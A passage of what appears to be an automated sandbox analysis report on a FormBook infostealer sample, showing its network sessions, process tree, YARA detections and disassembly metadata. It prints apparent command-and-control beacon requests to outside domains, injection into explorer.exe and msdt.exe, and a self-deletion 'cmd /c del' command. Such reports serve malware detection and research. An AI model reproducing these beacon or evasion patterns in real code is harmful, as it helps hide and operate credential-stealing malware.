                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                  3192.168.2.54977364.190.62.11180C:\Windows\explorer.exe
                                                  TimestampkBytes transferredDirectionData
                                                  Oct 13, 2021 19:47:51.203907013 CEST5807OUTGET /fqiq/?ZvEd=oM7C4s4K9Ux9NUwG97tedYlymorHgm5Kv3Umj1Gnv/i5ubiDMWU/+XDfdu3U3Pyuil7R&z0DH=f0Dtar1PYnAdDzS HTTP/1.1
                                                  Host: www.mambacustomboats.com
                                                  Connection: close
                                                  Data Raw: 00 00 00 00 00 00 00
                                                  Data Ascii:
                                                  Oct 13, 2021 19:47:51.249383926 CEST5809INHTTP/1.1 302 Found
                                                  date: Wed, 13 Oct 2021 17:47:51 GMT
                                                  content-type: text/html; charset=UTF-8
                                                  content-length: 0
                                                  x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_0iebMnn85rGPdDqIEJxeNy8gIbO6CRs7ZDHqhQVvU/PQfR/eAFVjJYiSzo9U0xPuetoM72JXq2vZLu3MQDBEFQ==
                                                  expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                  cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                  pragma: no-cache
                                                  last-modified: Wed, 13 Oct 2021 17:47:51 GMT
                                                  location: https://sedo.com/search/details/?partnerid=324561&language=e&domain=mambacustomboats.com&origin=sales_lander_1&utm_medium=Parking&utm_campaign=offerpage
                                                  x-cache-miss-from: parking-f666569bc-lfcv4
                                                  server: NginX
                                                  connection: close


                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                  4192.168.2.549789108.167.135.12280C:\Windows\explorer.exe
                                                  TimestampkBytes transferredDirectionData
                                                  Oct 13, 2021 19:48:01.554976940 CEST5851OUTGET /fqiq/?ZvEd=KZhYdxsAX/C25xiOpksKfhNe7DL7yKRLCy2J/73TfqSfqYhWOiYMofna8My9QnEOoaqj&z0DH=f0Dtar1PYnAdDzS HTTP/1.1
                                                  Host: www.esyscoloradosprings.com
                                                  Connection: close
                                                  Data Raw: 00 00 00 00 00 00 00
                                                  Data Ascii:
                                                  Oct 13, 2021 19:48:01.689186096 CEST5852INHTTP/1.1 503 Service Unavailable
                                                  Content-Type: text/html; charset=UTF-8
                                                  Content-Length: 884
                                                  Connection: close
                                                  P3P: CP="CAO PSA OUR"
                                                  Expires: Thu, 01 Jan 1970 00:00:00 GMT
                                                  Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                  Pragma: no-cache
                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 56 69 72 75 73 2f 53 70 79 77 61 72 65 20 44 6f 77 6e 6c 6f 61 64 20 42 6c 6f 63 6b 65 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 50 52 41 47 4d 41 22 20 43 4f 4e 54 45 4e 54 3d 22 4e 4f 2d 43 41 43 48 45 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0d 0a 3c 73 74 79 6c 65 3e 0d 0a 20 20 23 63 6f 6e 74 65 6e 74 20 7b 0d 0a 20 20 20 20 62 6f 72 64 65 72 3a 33 70 78 20 73 6f 6c 69 64 23 61 61 61 3b 0d 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 66 66 3b 0d 0a 20 20 20 20 6d 61 72 67 69 6e 3a 31 2e 35 65 6d 3b 0d 0a 20 20 20 20 70 61 64 64 69 6e 67 3a 31 2e 35 65 6d 3b 0d 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 48 65 6c 76 65 74 69 63 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 0d 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 65 6d 3b 0d 0a 20 20 7d 0d 0a 20 20 68 31 20 7b 0d 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 33 65 6d 3b 0d 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 0d 0a 20 20 20 20 63 6f 6c 6f 72 3a 23 31 39 36 33 39 30 3b 0d 0a 20 20 7d 0d 0a 20 20 62 20 7b 0d 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 6e 6f 72 6d 61 6c 3b 0d 0a 20 20 20 20 63 6f 6c 6f 72 3a 23 31 39 36 33 39 30 3b 0d 0a 20 20 7d 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 23 65 37 65 38 65 39 22 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 65 6e 74 22 3e 0d 0a 3c 68 31 3e 56 69 72 75 73 2f 53 70 79 77 61 72 65 20 44 6f 77 6e 6c 6f 61 64 20 42 6c 6f 63 6b 65 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 44 6f 77 6e 6c 6f 61 64 20 6f 66 20 74 68 65 20 76 69 72 75 73 2f 73 70 79 77 61 72 65 20 68 61 73 20 62 65 65 6e 20 62 6c 6f 63 6b 65 64 20 69 6e 20 61 63 63 6f 72 64 61 6e 63 65 20 77 69 74 68 20 63 6f 6d 70 61 6e 79 20 70 6f 6c 69 63 79 2e 20 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 79 6f 75 72 20 73 79 73 74 65 6d 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 69 66 20 79 6f 75 20 62 65 6c 69 65 76 65 20 74 68 69 73 20 69 73 20 69 6e 20 65 72 72 6f 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 3c 62 3e 46 69 6c 65 20 6e 61 6d 65 3a 3c 2f 62 3e 20 20 3c 2f 70 3e 0d 0a 3c 2f 64 69 76 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                  Data Ascii: <html><head><title>Virus/Spyware Download Blocked</title><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><META HTTP-EQUIV="PRAGMA" CONTENT="NO-CACHE"><meta name="viewport" content="initial-scale=1.0"><style> #content { border:3px solid#aaa; background-color:#fff; margin:1.5em; padding:1.5em; font-family:Tahoma,Helvetica,Arial,sans-serif; font-size:1em; } h1 { font-size:1.3em; font-weight:bold; color:#196390; } b { font-weight:normal; color:#196390; }</style></head><body bgcolor="#e7e8e9"><div id="content"><h1>Virus/Spyware Download Blocked</h1><p>Download of the virus/spyware has been blocked in accordance with company policy. Please contact your system administrator if you believe this is in error.</p><p><b>File name:</b> </p></div></body></html>


                                                  Code Manipulations

                                                  Statistics

                                                  CPU Usage

                                                  Click to jump to process

                                                  Memory Usage

                                                  Click to jump to process

                                                  High Level Behavior Distribution

                                                  Click to dive into process behavior distribution

                                                  Behavior

                                                  Click to jump to process

                                                  System Behavior

                                                  Analysis Process: divpCHa0h7.exe PID: 3240 Parent PID: 5928

                                                  General

                                                  Start time:19:45:59
                                                  Start date:13/10/2021
                                                  Path:C:\Users\user\Desktop\divpCHa0h7.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:'C:\Users\user\Desktop\divpCHa0h7.exe'
                                                  Imagebase:0x690000
                                                  File size:477696 bytes
                                                  MD5 hash:FDA0D823B262AC2B1BD76A2053C29692
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:.Net C# or VB.NET
                                                  Yara matches:
                                                  • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000001.00000002.267439269.0000000002AB1000.00000004.00000001.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.267848070.0000000003AB9000.00000004.00000001.sdmp, Author: Joe Security
                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.267848070.0000000003AB9000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.267848070.0000000003AB9000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                  Reputation:low

                                                  Chronological Activities

                                                  Analysis Process: divpCHa0h7.exe PID: 5712 Parent PID: 3240

                                                  General

                                                  Start time:19:46:08
                                                  Start date:13/10/2021
                                                  Path:C:\Users\user\Desktop\divpCHa0h7.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Users\user\Desktop\divpCHa0h7.exe
                                                  Imagebase:0x140000
                                                  File size:477696 bytes
                                                  MD5 hash:FDA0D823B262AC2B1BD76A2053C29692
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:low

                                                  Chronological Activities

                                                  Analysis Process: divpCHa0h7.exe PID: 4132 Parent PID: 3240

                                                  General

                                                  Start time:19:46:08
                                                  Start date:13/10/2021
                                                  Path:C:\Users\user\Desktop\divpCHa0h7.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Users\user\Desktop\divpCHa0h7.exe
                                                  Imagebase:0x3a0000
                                                  File size:477696 bytes
                                                  MD5 hash:FDA0D823B262AC2B1BD76A2053C29692
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:low

                                                  Chronological Activities

                                                  Analysis Process: divpCHa0h7.exe PID: 2256 Parent PID: 3240

                                                  General

                                                  Start time:19:46:09
                                                  Start date:13/10/2021
                                                  Path:C:\Users\user\Desktop\divpCHa0h7.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:C:\Users\user\Desktop\divpCHa0h7.exe
                                                  Imagebase:0x400000
                                                  File size:477696 bytes
                                                  MD5 hash:FDA0D823B262AC2B1BD76A2053C29692
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.361762124.00000000005D0000.00000040.00020000.sdmp, Author: Joe Security
                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.361762124.00000000005D0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.361762124.00000000005D0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000001.265367323.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000001.265367323.0000000000400000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000001.265367323.0000000000400000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.361396861.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.361396861.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.361396861.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.361951579.00000000009D0000.00000040.00020000.sdmp, Author: Joe Security
                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.361951579.00000000009D0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.361951579.00000000009D0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                  Reputation:low

                                                  Chronological Activities

                                                  Analysis Process: explorer.exe PID: 3472 Parent PID: 2256

                                                  General

                                                  Start time:19:46:10
                                                  Start date:13/10/2021
                                                  Path:C:\Windows\explorer.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\Explorer.EXE
                                                  Imagebase:0x7ff693d90000
                                                  File size:3933184 bytes
                                                  MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000000.290893406.0000000006D39000.00000040.00020000.sdmp, Author: Joe Security
                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000000.290893406.0000000006D39000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000000.290893406.0000000006D39000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000000.307316377.0000000006D39000.00000040.00020000.sdmp, Author: Joe Security
                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000000.307316377.0000000006D39000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000000.307316377.0000000006D39000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                  Reputation:high

                                                  Chronological Activities

                                                  Analysis Process: msdt.exe PID: 6440 Parent PID: 2256

                                                  General

                                                  Start time:19:46:52
                                                  Start date:13/10/2021
                                                  Path:C:\Windows\SysWOW64\msdt.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:C:\Windows\SysWOW64\msdt.exe
                                                  Imagebase:0x2f0000
                                                  File size:1508352 bytes
                                                  MD5 hash:7F0C51DBA69B9DE5DDF6AA04CE3A69F4
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000F.00000002.520122597.0000000002760000.00000040.00020000.sdmp, Author: Joe Security
                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000F.00000002.520122597.0000000002760000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000F.00000002.520122597.0000000002760000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000F.00000002.519918692.0000000002660000.00000040.00020000.sdmp, Author: Joe Security
                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000F.00000002.519918692.0000000002660000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000F.00000002.519918692.0000000002660000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                  • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000F.00000002.517884800.0000000000610000.00000004.00000001.sdmp, Author: Joe Security
                                                  • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000F.00000002.517884800.0000000000610000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                  • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000F.00000002.517884800.0000000000610000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                  Reputation:moderate

                                                  Chronological Activities

                                                  Analysis Process: cmd.exe PID: 6732 Parent PID: 6440

                                                  General

                                                  Start time:19:46:55
                                                  Start date:13/10/2021
                                                  Path:C:\Windows\SysWOW64\cmd.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:/c del 'C:\Users\user\Desktop\divpCHa0h7.exe'
                                                  Imagebase:0x150000
                                                  File size:232960 bytes
                                                  MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high

                                                  Chronological Activities

                                                  Analysis Process: conhost.exe PID: 6760 Parent PID: 6732

                                                  General

                                                  Start time:19:46:56
                                                  Start date:13/10/2021
                                                  Path:C:\Windows\System32\conhost.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                  Imagebase:0x7ff7ecfc0000
                                                  File size:625664 bytes
                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high

                                                  Chronological Activities

                                                  Disassembly

                                                  Code Analysis

                                                  Reset < >

                                                    Analysis Process: divpCHa0h7.exe PID: 3240 Parent PID: 5928 divpCHa0h7.exeCOMMON

                                                    Executed Functions

                                                    Function 04F90D51, Relevance: 1.8, APIs: 1, Instructions: 276COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SetWindowLongW.USER32(?,?,?), ref: 04F90D1D
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.268977565.0000000004F90000.00000040.00000001.sdmp, Offset: 04F90000, based on PE: false
                                                    Similarity
                                                    • API ID: LongWindow
                                                    • String ID:
                                                    • API String ID: 1378638983-0
                                                    • Opcode ID: 9f1af790c1e156dc30e075f473c6f6bfd87fd178ad3ad69d602dc7059402461e
                                                    • Instruction ID: 27f2fd50649c36d83aa3d0236454c3abdf1064218aed08b5092e82c941ba0445
                                                    • Opcode Fuzzy Hash: 9f1af790c1e156dc30e075f473c6f6bfd87fd178ad3ad69d602dc7059402461e
                                                    • Instruction Fuzzy Hash: CCB1CE35E003598FDB01DFA0D8549DDBBBAEFA9304F148619E405AB3A1EB74E946CB90
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 04F95A10, Relevance: 1.0, Instructions: 996COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.268977565.0000000004F90000.00000040.00000001.sdmp, Offset: 04F90000, based on PE: false
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: a0a98c7cf07f6da54eb0f08c0ddde081131424fd086e637a902f8f994f16862b
                                                    • Instruction ID: 035b10e48723f0740f7c7553d1b16cb22941a9fb0842bfd0c63d476f10274cfe
                                                    • Opcode Fuzzy Hash: a0a98c7cf07f6da54eb0f08c0ddde081131424fd086e637a902f8f994f16862b
                                                    • Instruction Fuzzy Hash: CDA20A34A00619DFDB65DF64C894AD9B7B2FF8A305F1182E9D4096B361EB30AE85CF50
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0106C5C1, Relevance: 6.1, APIs: 4, Instructions: 129threadCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetCurrentProcess.KERNEL32 ref: 0106C630
                                                    • GetCurrentThread.KERNEL32 ref: 0106C66D
                                                    • GetCurrentProcess.KERNEL32 ref: 0106C6AA
                                                    • GetCurrentThreadId.KERNEL32 ref: 0106C703
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.267038233.0000000001060000.00000040.00000001.sdmp, Offset: 01060000, based on PE: false
                                                    Similarity
                                                    • API ID: Current$ProcessThread
                                                    • String ID:
                                                    • API String ID: 2063062207-0
                                                    • Opcode ID: 13e81081fc86ba1aa993d8eb5bcac94e0d7b4571985bab500e370b9bfb633739
                                                    • Instruction ID: 7fc044dcaf9f9f6affb9cbdff976f9d6ecdcb66dacca25f176a7d593c7bb1822
                                                    • Opcode Fuzzy Hash: 13e81081fc86ba1aa993d8eb5bcac94e0d7b4571985bab500e370b9bfb633739
                                                    • Instruction Fuzzy Hash: 625164B49002888FEB14CFA9D588BDEBFF5EF48314F248459E449A3390D774A945CF66
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0106C5D0, Relevance: 6.1, APIs: 4, Instructions: 120threadCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetCurrentProcess.KERNEL32 ref: 0106C630
                                                    • GetCurrentThread.KERNEL32 ref: 0106C66D
                                                    • GetCurrentProcess.KERNEL32 ref: 0106C6AA
                                                    • GetCurrentThreadId.KERNEL32 ref: 0106C703
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.267038233.0000000001060000.00000040.00000001.sdmp, Offset: 01060000, based on PE: false
                                                    Similarity
                                                    • API ID: Current$ProcessThread
                                                    • String ID:
                                                    • API String ID: 2063062207-0
                                                    • Opcode ID: 3933b65172388b4338c826d2a6496118847a1e0f764771b7492e8408016c5ba0
                                                    • Instruction ID: 59a777f1e6e5447a77943319cf15147d06c984ccd4d9cd5444aa9161cc74bae5
                                                    • Opcode Fuzzy Hash: 3933b65172388b4338c826d2a6496118847a1e0f764771b7492e8408016c5ba0
                                                    • Instruction Fuzzy Hash: A25143B09002888FEB14CFA9D648BDEBFF5EF48314F248469E459A7390D774A844CF66
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0106A2D0, Relevance: 1.7, APIs: 1, Instructions: 196COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetModuleHandleW.KERNELBASE(00000000), ref: 0106A516
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.267038233.0000000001060000.00000040.00000001.sdmp, Offset: 01060000, based on PE: false
                                                    Similarity
                                                    • API ID: HandleModule
                                                    • String ID:
                                                    • API String ID: 4139908857-0
                                                    • Opcode ID: 867fe216ae871d34660750b1c65886c1d9d8f87ef0f03e769cd27223223f50f0
                                                    • Instruction ID: c9e4622a524cf6c855d8ffd7c2a7d0165b82be46d9ed088d1769777663fc39a4
                                                    • Opcode Fuzzy Hash: 867fe216ae871d34660750b1c65886c1d9d8f87ef0f03e769cd27223223f50f0
                                                    • Instruction Fuzzy Hash: 84714670A00B058FD764EF6AD04479ABBF5FF88204F00892EE58AE7A50DB74E945CF91
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 04F90A78, Relevance: 1.6, APIs: 1, Instructions: 113COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 04F90B8A
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.268977565.0000000004F90000.00000040.00000001.sdmp, Offset: 04F90000, based on PE: false
                                                    Similarity
                                                    • API ID: CreateWindow
                                                    • String ID:
                                                    • API String ID: 716092398-0
                                                    • Opcode ID: 887b6242d67ec0fa85c0d3a69102d08e6353a2234523c5185f0b55e69270d35d
                                                    • Instruction ID: 17e1ba157caed6a530d698cfdafb14042552fcd4abf7d1c1f131ab880fbe7876
                                                    • Opcode Fuzzy Hash: 887b6242d67ec0fa85c0d3a69102d08e6353a2234523c5185f0b55e69270d35d
                                                    • Instruction Fuzzy Hash: 34419FB1D103499FDF15CF99C884ADEBBF5BF48314F24852AE819AB210D774A885CF90
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 04F93030, Relevance: 1.6, APIs: 1, Instructions: 93COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CallWindowProcW.USER32(?,?,?,?,?), ref: 04F930F1
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.268977565.0000000004F90000.00000040.00000001.sdmp, Offset: 04F90000, based on PE: false
                                                    Similarity
                                                    • API ID: CallProcWindow
                                                    • String ID:
                                                    • API String ID: 2714655100-0
                                                    • Opcode ID: 5c1322bc3cd3645be05e81ff4d41d3bfa74519eae2f0efca5ec5cbf2b54cc4f1
                                                    • Instruction ID: 0222f1ecd3ee12cfa7cfb635c07c2016cddc5faf52f67882c01831511ad9c3bf
                                                    • Opcode Fuzzy Hash: 5c1322bc3cd3645be05e81ff4d41d3bfa74519eae2f0efca5ec5cbf2b54cc4f1
                                                    • Instruction Fuzzy Hash: 4B4118B5A003499FDB14CF99C888AAABBF5FF88314F14C459D919A7321D735A842CFA1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0106C7F0, Relevance: 1.6, APIs: 1, Instructions: 68COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0106C87F
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.267038233.0000000001060000.00000040.00000001.sdmp, Offset: 01060000, based on PE: false
                                                    Similarity
                                                    • API ID: DuplicateHandle
                                                    • String ID:
                                                    • API String ID: 3793708945-0
                                                    • Opcode ID: 026b9ec3ccf28422b01e480b444a23244dc83f04a19fef951b06895c57fe25db
                                                    • Instruction ID: b0ed84fc45415ab9af187bb5f625bb0ca4b12eafb8c20bdec96ace99ec858db0
                                                    • Opcode Fuzzy Hash: 026b9ec3ccf28422b01e480b444a23244dc83f04a19fef951b06895c57fe25db
                                                    • Instruction Fuzzy Hash: 252103B5D002489FDB10CFA9D985AEEBFF8FB48320F14841AE958A7310C374A941CFA1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0106C7F8, Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0106C87F
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.267038233.0000000001060000.00000040.00000001.sdmp, Offset: 01060000, based on PE: false
                                                    Similarity
                                                    • API ID: DuplicateHandle
                                                    • String ID:
                                                    • API String ID: 3793708945-0
                                                    • Opcode ID: 3082377519c401fb61181b5df386bfd2d8feb1fcfcd1fe110be8bf210461a2db
                                                    • Instruction ID: 9a054ed673554b3e610f23bd1d24ef4db04a642b5e43480e47511a14f59c4a6c
                                                    • Opcode Fuzzy Hash: 3082377519c401fb61181b5df386bfd2d8feb1fcfcd1fe110be8bf210461a2db
                                                    • Instruction Fuzzy Hash: 7221B0B5D01248AFDB10CFA9D984ADEBFF8EB48324F14841AE954A7350D374A954CFA1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0106A731, Relevance: 1.6, APIs: 1, Instructions: 56libraryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0106A591,00000800,00000000,00000000), ref: 0106A7A2
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.267038233.0000000001060000.00000040.00000001.sdmp, Offset: 01060000, based on PE: false
                                                    Similarity
                                                    • API ID: LibraryLoad
                                                    • String ID:
                                                    • API String ID: 1029625771-0
                                                    • Opcode ID: ac629b0001b772de51a36042f553d8539124729785defbd34073f313cd23a7b3
                                                    • Instruction ID: 41db2bc84f941545252d3ea39da672e5576e77332e306d72dbcae18dd6247232
                                                    • Opcode Fuzzy Hash: ac629b0001b772de51a36042f553d8539124729785defbd34073f313cd23a7b3
                                                    • Instruction Fuzzy Hash: 7F11E7B69002499FDB10DF9AD888ADEFBF8EB48314F14842AD955B7200C7799546CFA1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 01069DA0, Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,0106A591,00000800,00000000,00000000), ref: 0106A7A2
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.267038233.0000000001060000.00000040.00000001.sdmp, Offset: 01060000, based on PE: false
                                                    Similarity
                                                    • API ID: LibraryLoad
                                                    • String ID:
                                                    • API String ID: 1029625771-0
                                                    • Opcode ID: 087fb82624fcadd77dfd4142b2d6de23362fa28f36ebe7ce45f0cff6aff75ab7
                                                    • Instruction ID: e5406679e38c4dde5e373d3552bae63b127d750c2b75715cab5ad3e687e199a3
                                                    • Opcode Fuzzy Hash: 087fb82624fcadd77dfd4142b2d6de23362fa28f36ebe7ce45f0cff6aff75ab7
                                                    • Instruction Fuzzy Hash: AD11D6B59002499FDB10DF9AC844ADEFBF9AB88314F14842AE955B7200C379A545CFA1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 04F90CB8, Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                                    Download Yara Rule
